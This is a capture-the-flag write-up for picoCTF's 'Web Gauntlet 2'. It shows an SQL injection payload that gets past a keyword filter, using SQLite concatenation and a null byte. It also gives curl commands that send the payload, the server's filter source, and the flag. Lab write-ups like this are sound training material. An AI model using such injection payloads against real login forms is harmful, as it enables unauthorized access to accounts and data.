Web Gauntlet 2
This website looks familiar... Log in as admin Site: http://mercury.picoctf.net:35178/ Filter: http://mercury.picoctf.net:35178/filter.php
- 1.According to filter.php the application filters the following:
or and true false union like = > < ; -- /* */ admin. - 2.The query that solves this is
ad'||'min'%00, which is similar to the final payload in the "Web Gauntlet" challenge from the PicoCTF 2020 Mini competition. In sqlite the||operator concatenates strings, thus allowing us to bypass the filter foradmin. Next, the%00is a null byte, which terminates the SQL query. - 3.A null byte cannot be typed directly into the website. So we use cURL instead:
curl --data "user=ad'||'min'%00&pass=a" http://mercury.picoctf.net:35178/index.php --cookie "PHPSESSID=5ntoldq0gkiutgqkmkgfqbe5vb" --output -. I copied thePHPSESSIDcookie from the browser, which is important because it is how the website knows to give us the flag when we go to/filter.phpto get the flag. - 4.We can retreive the flag with the browser that has the same
PHPSESSIDor wth curl:curl http://mercury.picoctf.net:35178/filter.php --cookie "PHPSESSID=5ntoldq0gkiutgqkmkgfqbe5vb" | grep picoCTF - 5.The code for the filter and the flag are shown in
/filter.phpwhen the login is bypassed:<?phpsession_start();if (!isset($_SESSION["winner2"])) {$_SESSION["winner2"] = 0;}$win = $_SESSION["winner2"];$view = ($_SERVER["PHP_SELF"] == "/filter.php");if ($win === 0) {$filter = array("or", "and", "true", "false", "union", "like", "=", ">", "<", ";", "--", "/*", "*/", "admin");if ($view) {echo "Filters: ".implode(" ", $filter)."<br/>";}} else if ($win === 1) {if ($view) {highlight_file("filter.php");}$_SESSION["winner2"] = 0; // <- Don't refresh!} else {$_SESSION["winner2"] = 0;}// picoCTF{0n3_m0r3_t1m3_86f3e77f3c5a076866a0fdb3b29c52fd}?>
picoCTF{0n3_m0r3_t1m3_86f3e77f3c5a076866a0fdb3b29c52fd}Last modified 6mo ago